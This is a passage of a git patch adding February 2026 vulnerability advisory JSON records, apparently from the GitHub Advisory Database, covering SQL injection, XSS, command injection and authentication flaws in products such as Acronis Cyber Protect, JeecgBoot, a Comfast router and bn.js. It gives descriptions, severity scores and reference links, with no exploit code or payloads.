advisories/unreviewed/2026/02/GHSA-8f5v-g9hx-qc4q/GHSA-8f5v-g9hx-qc4q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p3p8-xvrh-mwgr/GHSA-p3p8-xvrh-mwgr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json diff --git a/advisories/unreviewed/2026/02/GHSA-5pfr-259p-873j/GHSA-5pfr-259p-873j.json b/advisories/unreviewed/2026/02/GHSA-5pfr-259p-873j/GHSA-5pfr-259p-873j.json new file mode 100644 index 0000000000000..4b806f6e4d4d4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5pfr-259p-873j/GHSA-5pfr-259p-873j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pfr-259p-873j", + "modified": "2026-02-20T03:31:39Z", + "published": "2026-02-20T03:31:39Z", + "aliases": [ + "CVE-2025-30411" + ], + "details": "Sensitive data disclosure and manipulation due to improper authentication. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, Windows) before build 41800.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30411" + }, + { + "type": "WEB", + "url": "https://security-advisory.acronis.com/advisories/SEC-8768" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1390" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-658m-53rw-9pgg/GHSA-658m-53rw-9pgg.json b/advisories/unreviewed/2026/02/GHSA-658m-53rw-9pgg/GHSA-658m-53rw-9pgg.json new file mode 100644 index 0000000000000..736bddac5788c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-658m-53rw-9pgg/GHSA-658m-53rw-9pgg.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-658m-53rw-9pgg", + "modified": "2026-02-20T03:31:40Z", + "published": "2026-02-20T03:31:39Z", + "aliases": [ + "CVE-2026-2820" + ], + "details": "A security flaw has been discovered in Fujian Smart Integrated Management Platform System up to 7.5. This issue affects some unknown processing of the file /Module/CRXT/Controller/XAccessPermissionPlus.ashx. The manipulation of the argument DeviceIDS results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2820" + }, + { + "type": "WEB", + "url": "https://github.com/luoye197-prog/cve-yinda-sql/blob/main/introduce" + }, + { + "type": "WEB", + "url": "https://github.com/luoye197-prog/cve-yinda-sql/blob/main/poc.py" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346945" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346945" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753397" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T02:16:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7jwr-q23r-96hf/GHSA-7jwr-q23r-96hf.json b/advisories/unreviewed/2026/02/GHSA-7jwr-q23r-96hf/GHSA-7jwr-q23r-96hf.json new file mode 100644 index 0000000000000..ebb9931d38611 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7jwr-q23r-96hf/GHSA-7jwr-q23r-96hf.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jwr-q23r-96hf", + "modified": "2026-02-20T03:31:40Z", + "published": "2026-02-20T03:31:40Z", + "aliases": [ + "CVE-2026-2821" + ], + "details": "A weakness has been identified in Fujian Smart Integrated Management Platform System up to 7.5. Impacted is an unknown function of the file /Module/CRXT/Controller/XCamera.ashx. This manipulation of the argument ChannelName causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2821" + }, + { + "type": "WEB", + "url": "https://github.com/luoye197-prog/cve-yinda-sql2/blob/main/introduce" + }, + { + "type": "WEB", + "url": "https://github.com/luoye197-prog/cve-yinda-sql2/blob/main/poc.py" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346946" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346946" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753405" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T03:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8823-cww3-2gv3/GHSA-8823-cww3-2gv3.json b/advisories/unreviewed/2026/02/GHSA-8823-cww3-2gv3/GHSA-8823-cww3-2gv3.json new file mode 100644 index 0000000000000..a4837db4ed474 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8823-cww3-2gv3/GHSA-8823-cww3-2gv3.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8823-cww3-2gv3", + "modified": "2026-02-20T03:31:40Z", + "published": "2026-02-20T03:31:40Z", + "aliases": [ + "CVE-2026-2384" + ], + "details": "The Quiz Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `vc_quizmaker` shortcode in all versions up to, and including, 6.7.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\nNote: This vulnerability requires WPBakery Page Builder to be installed and active", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2384" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.1.7/pb_templates/quiz_maker_wpbvc.php#L13" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.1.7/pb_templates/quiz_maker_wpbvc.php#L60" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e54e2831-e5e9-43f4-acb6-9cf00fdb4e57?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T03:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8f5v-g9hx-qc4q/GHSA-8f5v-g9hx-qc4q.json b/advisories/unreviewed/2026/02/GHSA-8f5v-g9hx-qc4q/GHSA-8f5v-g9hx-qc4q.json new file mode 100644 index 0000000000000..535ec65b4021d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8f5v-g9hx-qc4q/GHSA-8f5v-g9hx-qc4q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8f5v-g9hx-qc4q", + "modified": "2026-02-20T03:31:39Z", + "published": "2026-02-20T03:31:39Z", + "aliases": [ + "CVE-2026-2819" + ], + "details": "A vulnerability was identified in Dromara RuoYi-Vue-Plus up to 5.5.3. This vulnerability affects the function SaServletFilter of the file /workflow/instance/deleteByInstanceIds of the component Workflow Module. The manipulation leads to missing authorization. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2819" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346944" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346944" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753321" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T02:16:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p3p8-xvrh-mwgr/GHSA-p3p8-xvrh-mwgr.json b/advisories/unreviewed/2026/02/GHSA-p3p8-xvrh-mwgr/GHSA-p3p8-xvrh-mwgr.json new file mode 100644 index 0000000000000..9d310c24b3400 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p3p8-xvrh-mwgr/GHSA-p3p8-xvrh-mwgr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p3p8-xvrh-mwgr", + "modified": "2026-02-20T03:31:39Z", + "published": "2026-02-20T03:31:39Z", + "aliases": [ + "CVE-2025-30416" + ], + "details": "Sensitive data disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, Windows) before build 41800.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30416" + }, + { + "type": "WEB", + "url": "https://security-advisory.acronis.com/advisories/SEC-8766" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json b/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json new file mode 100644 index 0000000000000..73ab5625a0540 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vvcr-j24q-wc29/GHSA-vvcr-j24q-wc29.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vvcr-j24q-wc29", + "modified": "2026-02-20T03:31:39Z", + "published": "2026-02-20T03:31:39Z", + "aliases": [ + "CVE-2025-30410" + ], + "details": "Sensitive data disclosure and manipulation due to missing authentication. The following products are affected: Acronis Cyber Protect Cloud Agent (Linux, macOS, Windows) before build 39870, Acronis Cyber Protect 16 (Linux, macOS, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, macOS, Windows) before build 41800.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30410" + }, + { + "type": "WEB", + "url": "https://security-advisory.acronis.com/advisories/SEC-8641" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json b/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json new file mode 100644 index 0000000000000..e7bff5ad48ee1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj5x-4c9j-jr89", + "modified": "2026-02-20T03:31:39Z", + "published": "2026-02-20T03:31:39Z", + "aliases": [ + "CVE-2025-30412" + ], + "details": "Sensitive data disclosure and manipulation due to improper authentication. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, Windows) before build 41800.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30412" + }, + { + "type": "WEB", + "url": "https://security-advisory.acronis.com/advisories/SEC-8598" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1390" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T01:15:59Z" + } +} \ No newline at end of file From 8b38a69ce3b3c24cad9b3d4cd95afa245b2ddd0d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 06:32:23 +0000 Subject: [PATCH 03/77] Publish Advisories GHSA-2h5p-xm7c-389w GHSA-378v-28hj-76wf GHSA-5fgx-x2mx-c652 GHSA-6fw7-r4h4-7857 GHSA-6wwj-pg79-rf37 GHSA-7544-9rpr-83f6 GHSA-cg6c-xr24-rrqf GHSA-j27m-px7h-crj7 GHSA-p922-cfp2-x9v3 GHSA-w4rx-r6r4-5c2v GHSA-w8hp-9h4v-r2fg GHSA-wr9x-74ff-qxqp --- .../GHSA-2h5p-xm7c-389w.json | 52 ++++++++++++++++ .../GHSA-378v-28hj-76wf.json | 60 +++++++++++++++++++ .../GHSA-5fgx-x2mx-c652.json | 52 ++++++++++++++++ .../GHSA-6fw7-r4h4-7857.json | 25 ++++++++ .../GHSA-6wwj-pg79-rf37.json | 52 ++++++++++++++++ .../GHSA-7544-9rpr-83f6.json | 25 ++++++++ .../GHSA-cg6c-xr24-rrqf.json | 25 ++++++++ .../GHSA-j27m-px7h-crj7.json | 25 ++++++++ .../GHSA-p922-cfp2-x9v3.json | 25 ++++++++ .../GHSA-w4rx-r6r4-5c2v.json | 25 ++++++++ .../GHSA-w8hp-9h4v-r2fg.json | 25 ++++++++ .../GHSA-wr9x-74ff-qxqp.json | 25 ++++++++ 12 files changed, 416 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2h5p-xm7c-389w/GHSA-2h5p-xm7c-389w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6fw7-r4h4-7857/GHSA-6fw7-r4h4-7857.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7544-9rpr-83f6/GHSA-7544-9rpr-83f6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cg6c-xr24-rrqf/GHSA-cg6c-xr24-rrqf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j27m-px7h-crj7/GHSA-j27m-px7h-crj7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json diff --git a/advisories/unreviewed/2026/02/GHSA-2h5p-xm7c-389w/GHSA-2h5p-xm7c-389w.json b/advisories/unreviewed/2026/02/GHSA-2h5p-xm7c-389w/GHSA-2h5p-xm7c-389w.json new file mode 100644 index 0000000000000..7e23355a1d293 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2h5p-xm7c-389w/GHSA-2h5p-xm7c-389w.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2h5p-xm7c-389w", + "modified": "2026-02-20T06:30:39Z", + "published": "2026-02-20T06:30:39Z", + "aliases": [ + "CVE-2026-2822" + ], + "details": "A security vulnerability has been detected in JeecgBoot up to 3.9.1. The affected element is an unknown function of the file /jeecgboot/sys/dict/loadDict/airag_app,1,create_by of the component Backend Interface. Such manipulation of the argument keyword leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2822" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346947" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346947" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753792" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/meizhiyuwai/ha3yxb/lowxgbh5nne881e6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T05:17:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json b/advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json new file mode 100644 index 0000000000000..b195f365c2995 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-378v-28hj-76wf", + "modified": "2026-02-20T06:30:39Z", + "published": "2026-02-20T06:30:39Z", + "aliases": [ + "CVE-2026-2739" + ], + "details": "This affects versions of the package bn.js before 5.2.3. Calling maskn(0) on any BN instance corrupts the internal state, causing toString(), divmod(), and other methods to enter an infinite loop, hanging the process indefinitely.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2739" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/issues/186" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/issues/316" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/pull/317" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/commit/33df26b5771e824f303a79ec6407409376baa64b" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Kr0emer/02370d18328c28b5dd7f9ac880d22a91" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-BNJS-15274301" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-835" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T05:17:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json b/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json new file mode 100644 index 0000000000000..5093e5f59ce89 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5fgx-x2mx-c652", + "modified": "2026-02-20T06:30:39Z", + "published": "2026-02-20T06:30:39Z", + "aliases": [ + "CVE-2026-2824" + ], + "details": "A flaw has been found in Comfast CF-E7 2.6.0.9. This affects the function sub_441CF4 of the file /cgi-bin/mbox-config?method=SET§ion=ping_config of the component webmggnt. Executing a manipulation of the argument destination can lead to command injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2824" + }, + { + "type": "WEB", + "url": "https://github.com/jinhao118/cve/blob/main/ComFast%20Router_4.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346949" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346949" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753878" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T06:17:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6fw7-r4h4-7857/GHSA-6fw7-r4h4-7857.json b/advisories/unreviewed/2026/02/GHSA-6fw7-r4h4-7857/GHSA-6fw7-r4h4-7857.json new file mode 100644 index 0000000000000..85dac78e232b2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6fw7-r4h4-7857/GHSA-6fw7-r4h4-7857.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fw7-r4h4-7857", + "modified": "2026-02-20T06:30:39Z", + "published": "2026-02-20T06:30:39Z", + "aliases": [ + "CVE-2026-27325" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27325" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json b/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json new file mode 100644 index 0000000000000..3b2a346b5c526 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6wwj-pg79-rf37", + "modified": "2026-02-20T06:30:39Z", + "published": "2026-02-20T06:30:39Z", + "aliases": [ + "CVE-2026-2823" + ], + "details": "A vulnerability was detected in Comfast CF-E7 2.6.0.9. The impacted element is the function sub_41ACCC of the file /cgi-bin/mbox-config?method=SET§ion=ntp_timezone of the component webmggnt. Performing a manipulation of the argument timestr results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2823" + }, + { + "type": "WEB", + "url": "https://github.com/jinhao118/cve/blob/main/ComFast%20Router_3.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346948" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346948" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753871" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T05:17:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7544-9rpr-83f6/GHSA-7544-9rpr-83f6.json b/advisories/unreviewed/2026/02/GHSA-7544-9rpr-83f6/GHSA-7544-9rpr-83f6.json new file mode 100644 index 0000000000000..f5987cd7d20f2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7544-9rpr-83f6/GHSA-7544-9rpr-83f6.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7544-9rpr-83f6", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27321" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27321" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cg6c-xr24-rrqf/GHSA-cg6c-xr24-rrqf.json b/advisories/unreviewed/2026/02/GHSA-cg6c-xr24-rrqf/GHSA-cg6c-xr24-rrqf.json new file mode 100644 index 0000000000000..e65ae1f219a44 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cg6c-xr24-rrqf/GHSA-cg6c-xr24-rrqf.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg6c-xr24-rrqf", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27323" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27323" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j27m-px7h-crj7/GHSA-j27m-px7h-crj7.json b/advisories/unreviewed/2026/02/GHSA-j27m-px7h-crj7/GHSA-j27m-px7h-crj7.json new file mode 100644 index 0000000000000..3cf3cee2153ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j27m-px7h-crj7/GHSA-j27m-px7h-crj7.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j27m-px7h-crj7", + "modified": "2026-02-20T06:30:38Z", + "published": 